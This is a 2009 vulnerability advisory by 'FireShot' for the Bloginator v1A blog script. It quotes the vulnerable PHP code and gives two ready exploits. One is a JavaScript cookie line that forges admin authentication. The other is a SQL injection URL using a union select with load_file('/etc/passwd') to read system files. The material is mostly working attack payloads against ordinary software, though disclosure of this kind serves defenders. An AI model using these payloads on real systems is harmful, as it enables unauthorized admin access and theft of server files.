Bloginator v1a (Cookie Bypass/SQL) Multiple Remote Vulnerabilities

2009-03-25 / 2009-03-26
Credit: FireShot
Risk: High
Local: No
Remote: Yes

########################################################################## Author = FireShot , Jacopo Vuga. Mail = fireshot<at>autistici<dot>org Software = Bloginator V1A Download = http://kamads.com/kamads_ads/download.php?email=bloginator&ID=0 Greets to = Osirys, Myral, str0ke ########################################################################### Vulnerability = Insicure Cookie Handling ########################################################################### [CODE] [URL] www.site.com/bloginator/articleCall.php global $name,$password,$returnLink; $p_name = strip_tags(substr($_POST['name'],0,32)); $p_password = strip_tags(substr($_POST['password'],0,32)); if(crypt($p_name , $name) == $name and crypt($p_password,$password) == $password ) { setcookie("identifyYourself","you are identified"); print "Login successfull<br>"; print $returnLink; } else {print "Wrong username or password"; } } [/CODE] [EXPLOIT] javascript:document.cookie = "identifyYourself=you+are+identified; path=/"; [/EXPLOIT] ############################################################################ Vulnerability = SQL injection ############################################################################ [CODE] [URL] www.site.com/bloginator/articleCall.php $action = @$_GET['action']; [...] $id = $_GET['id']; [...] function editArticle($id,$message) { global $returnLink; $query = "select * FROM articles WHERE id='$id'"; $sql = mysql_query($query) or die(mysql_query()); $title = mysql_result($sql,0,'title'); $title = htmlentities($title); $article = mysql_result($sql,0,'article'); $article = htmlentities($article); $link = mysql_result($sql,0,'link'); $link = htmlentities($link); startHTML("Edit ID # ".$id); ?> [/CODE] [EXPLOIT] As Admin (Post Cookie exploit) you can inj arbitrary SQL code in the query. www.site.com/action=edit&id=fireshot' union select 1,2,3,4,load_file('/etc/passwd'),6,7 order by '* [/EXPLOIT] ##############################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top